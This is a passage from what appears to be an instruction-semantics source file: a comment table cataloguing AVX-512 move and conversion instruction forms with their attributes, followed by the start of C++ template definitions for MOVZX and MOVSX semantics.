4740 VPMOVWB VPMOVWB_MEMu8_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4862 VMOVDQU8 VMOVDQU8_XMMu8_MASKmskw_XMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX
4863 VMOVDQU8 VMOVDQU8_XMMu8_MASKmskw_MEMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4864 VMOVDQU8 VMOVDQU8_XMMu8_MASKmskw_XMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX
4865 VMOVDQU8 VMOVDQU8_MEMu8_MASKmskw_XMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4866 VMOVDQU8 VMOVDQU8_YMMu8_MASKmskw_YMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX
4867 VMOVDQU8 VMOVDQU8_YMMu8_MASKmskw_MEMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4868 VMOVDQU8 VMOVDQU8_YMMu8_MASKmskw_YMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX
4869 VMOVDQU8 VMOVDQU8_MEMu8_MASKmskw_YMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4870 VMOVDQU8 VMOVDQU8_ZMMu8_MASKmskw_ZMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX
4871 VMOVDQU8 VMOVDQU8_ZMMu8_MASKmskw_MEMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4872 VMOVDQU8 VMOVDQU8_ZMMu8_MASKmskw_ZMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX
4873 VMOVDQU8 VMOVDQU8_MEMu8_MASKmskw_ZMMu8_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4878 VPMOVUSDB VPMOVUSDB_XMMu8_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
4879 VPMOVUSDB VPMOVUSDB_MEMu8_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4880 VPMOVUSDB VPMOVUSDB_XMMu8_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
4881 VPMOVUSDB VPMOVUSDB_MEMu8_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4882 VPMOVUSDB VPMOVUSDB_XMMu8_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
4883 VPMOVUSDB VPMOVUSDB_MEMu8_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4908 VPMOVUSDW VPMOVUSDW_YMMu16_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
4909 VPMOVUSDW VPMOVUSDW_MEMu16_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4910 VPMOVUSDW VPMOVUSDW_XMMu16_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
4911 VPMOVUSDW VPMOVUSDW_MEMu16_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
4912 VPMOVUSDW VPMOVUSDW_XMMu16_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
4913 VPMOVUSDW VPMOVUSDW_MEMu16_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5292 VPMOVQ2M VPMOVQ2M_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512DQ_128 ATTRIBUTES:
5293 VPMOVQ2M VPMOVQ2M_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512DQ_256 ATTRIBUTES:
5294 VPMOVQ2M VPMOVQ2M_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512DQ_512 ATTRIBUTES:
5515 VMOVDQU16 VMOVDQU16_XMMu16_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX
5516 VMOVDQU16 VMOVDQU16_XMMu16_MASKmskw_MEMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5517 VMOVDQU16 VMOVDQU16_XMMu16_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX
5518 VMOVDQU16 VMOVDQU16_MEMu16_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5519 VMOVDQU16 VMOVDQU16_YMMu16_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX
5520 VMOVDQU16 VMOVDQU16_YMMu16_MASKmskw_MEMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5521 VMOVDQU16 VMOVDQU16_YMMu16_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX
5522 VMOVDQU16 VMOVDQU16_MEMu16_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5523 VMOVDQU16 VMOVDQU16_ZMMu16_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX
5524 VMOVDQU16 VMOVDQU16_ZMMu16_MASKmskw_MEMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5525 VMOVDQU16 VMOVDQU16_ZMMu16_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX
5526 VMOVDQU16 VMOVDQU16_MEMu16_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5535 VPMOVSXBD VPMOVSXBD_ZMMi32_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
5536 VPMOVSXBD VPMOVSXBD_ZMMi32_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5537 VPMOVSXBD VPMOVSXBD_XMMi32_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
5538 VPMOVSXBD VPMOVSXBD_XMMi32_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5539 VPMOVSXBD VPMOVSXBD_YMMi32_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
5540 VPMOVSXBD VPMOVSXBD_YMMi32_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5627 VPMOVZXWD VPMOVZXWD_ZMMi32_MASKmskw_YMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
5628 VPMOVZXWD VPMOVZXWD_ZMMi32_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5629 VPMOVZXWD VPMOVZXWD_XMMi32_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
5630 VPMOVZXWD VPMOVZXWD_XMMi32_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5631 VPMOVZXWD VPMOVZXWD_YMMi32_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
5632 VPMOVZXWD VPMOVZXWD_YMMi32_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5636 VMOVDQU64 VMOVDQU64_ZMMu64_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
5637 VMOVDQU64 VMOVDQU64_ZMMu64_MASKmskw_MEMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5638 VMOVDQU64 VMOVDQU64_ZMMu64_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
5639 VMOVDQU64 VMOVDQU64_MEMu64_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5640 VMOVDQU64 VMOVDQU64_XMMu64_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
5641 VMOVDQU64 VMOVDQU64_XMMu64_MASKmskw_MEMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5642 VMOVDQU64 VMOVDQU64_XMMu64_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
5643 VMOVDQU64 VMOVDQU64_MEMu64_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5644 VMOVDQU64 VMOVDQU64_YMMu64_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
5645 VMOVDQU64 VMOVDQU64_YMMu64_MASKmskw_MEMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5646 VMOVDQU64 VMOVDQU64_YMMu64_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
5647 VMOVDQU64 VMOVDQU64_MEMu64_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5665 VMOVDQA64 VMOVDQA64_ZMMu64_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
5666 VMOVDQA64 VMOVDQA64_ZMMu64_MASKmskw_MEMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
5667 VMOVDQA64 VMOVDQA64_ZMMu64_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
5668 VMOVDQA64 VMOVDQA64_MEMu64_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
5669 VMOVDQA64 VMOVDQA64_XMMu64_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
5670 VMOVDQA64 VMOVDQA64_XMMu64_MASKmskw_MEMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
5671 VMOVDQA64 VMOVDQA64_XMMu64_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
5672 VMOVDQA64 VMOVDQA64_MEMu64_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
5673 VMOVDQA64 VMOVDQA64_YMMu64_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
5674 VMOVDQA64 VMOVDQA64_YMMu64_MASKmskw_MEMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
5675 VMOVDQA64 VMOVDQA64_YMMu64_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
5676 VMOVDQA64 VMOVDQA64_MEMu64_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
5902 VPMOVZXDQ VPMOVZXDQ_ZMMi64_MASKmskw_YMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
5903 VPMOVZXDQ VPMOVZXDQ_ZMMi64_MASKmskw_MEMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5904 VPMOVZXDQ VPMOVZXDQ_XMMi64_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
5905 VPMOVZXDQ VPMOVZXDQ_XMMi64_MASKmskw_MEMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5906 VPMOVZXDQ VPMOVZXDQ_YMMi64_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
5907 VPMOVZXDQ VPMOVZXDQ_YMMi64_MASKmskw_MEMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5931 VPMOVUSWB VPMOVUSWB_XMMu8_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX
5932 VPMOVUSWB VPMOVUSWB_MEMu8_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5933 VPMOVUSWB VPMOVUSWB_XMMu8_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX
5934 VPMOVUSWB VPMOVUSWB_MEMu8_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5935 VPMOVUSWB VPMOVUSWB_YMMu8_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX
5936 VPMOVUSWB VPMOVUSWB_MEMu8_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5961 VPMOVSWB VPMOVSWB_XMMi8_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX
5962 VPMOVSWB VPMOVSWB_MEMi8_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5963 VPMOVSWB VPMOVSWB_XMMi8_MASKmskw_YMMi16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX
5964 VPMOVSWB VPMOVSWB_MEMi8_MASKmskw_YMMi16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5965 VPMOVSWB VPMOVSWB_YMMi8_MASKmskw_ZMMi16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX
5966 VPMOVSWB VPMOVSWB_MEMi8_MASKmskw_ZMMi16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5990 VPMOVSXWD VPMOVSXWD_ZMMi32_MASKmskw_YMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
5991 VPMOVSXWD VPMOVSXWD_ZMMi32_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5992 VPMOVSXWD VPMOVSXWD_XMMi32_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
5993 VPMOVSXWD VPMOVSXWD_XMMi32_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5994 VPMOVSXWD VPMOVSXWD_YMMi32_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
5995 VPMOVSXWD VPMOVSXWD_YMMi32_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5996 VMOVHLPS VMOVHLPS_XMMf32_XMMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES:
6007 VPMOVSXWQ VPMOVSXWQ_ZMMi64_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
6008 VPMOVSXWQ VPMOVSXWQ_ZMMi64_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
6009 VPMOVSXWQ VPMOVSXWQ_XMMi64_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
6010 VPMOVSXWQ VPMOVSXWQ_XMMi64_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
6011 VPMOVSXWQ VPMOVSXWQ_YMMi64_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
6012 VPMOVSXWQ VPMOVSXWQ_YMMi64_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
6171 VMOVDQA32 VMOVDQA32_ZMMu32_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
6172 VMOVDQA32 VMOVDQA32_ZMMu32_MASKmskw_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
6173 VMOVDQA32 VMOVDQA32_ZMMu32_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
6174 VMOVDQA32 VMOVDQA32_MEMu32_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
6175 VMOVDQA32 VMOVDQA32_XMMu32_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
6176 VMOVDQA32 VMOVDQA32_XMMu32_MASKmskw_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
6177 VMOVDQA32 VMOVDQA32_XMMu32_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
6178 VMOVDQA32 VMOVDQA32_MEMu32_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
6179 VMOVDQA32 VMOVDQA32_YMMu32_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
6180 VMOVDQA32 VMOVDQA32_YMMu32_MASKmskw_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
6181 VMOVDQA32 VMOVDQA32_YMMu32_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
6182 VMOVDQA32 VMOVDQA32_MEMu32_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
6309 VPMOVQW VPMOVQW_XMMu16_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
6310 VPMOVQW VPMOVQW_MEMu16_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
6311 VPMOVQW VPMOVQW_XMMu16_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
6312 VPMOVQW VPMOVQW_MEMu16_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
6313 VPMOVQW VPMOVQW_XMMu16_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
6314 VPMOVQW VPMOVQW_MEMu16_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
6325 VPMOVQB VPMOVQB_XMMu8_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
6326 VPMOVQB VPMOVQB_MEMu8_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
6327 VPMOVQB VPMOVQB_XMMu8_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
6328 VPMOVQB VPMOVQB_MEMu8_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
6329 VPMOVQB VPMOVQB_XMMu8_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
6330 VPMOVQB VPMOVQB_MEMu8_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
6331 VPMOVQD VPMOVQD_YMMu32_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
6332 VPMOVQD VPMOVQD_MEMu32_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
6333 VPMOVQD VPMOVQD_XMMu32_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
6334 VPMOVQD VPMOVQD_MEMu32_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
6335 VPMOVQD VPMOVQD_XMMu32_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
6336 VPMOVQD VPMOVQD_MEMu32_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
6349 VPMOVM2Q VPMOVM2Q_XMMu64_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512DQ_128 ATTRIBUTES:
6350 VPMOVM2Q VPMOVM2Q_YMMu64_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512DQ_256 ATTRIBUTES:
6351 VPMOVM2Q VPMOVM2Q_ZMMu64_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512DQ_512 ATTRIBUTES:
*/
namespace {
template <typename D, typename S>
DEF_SEM(MOVZX, D dst, S src) {
WriteZExt(dst, Read(src));
return memory;
}
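// MOVSX first sign-extends the source to `SextT`, then zero-extends that
// result into the destination; the outer `WriteZExt` is what models x86-64's
// implicit clearing of bits 63:32 when a 32-bit register is written.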
template <typename D, typename S, typename SextT>
DEF_SEM(MOVSX, D dst, S src) {
WriteZExt(dst, SExtTo<SextT>(Read(src)));
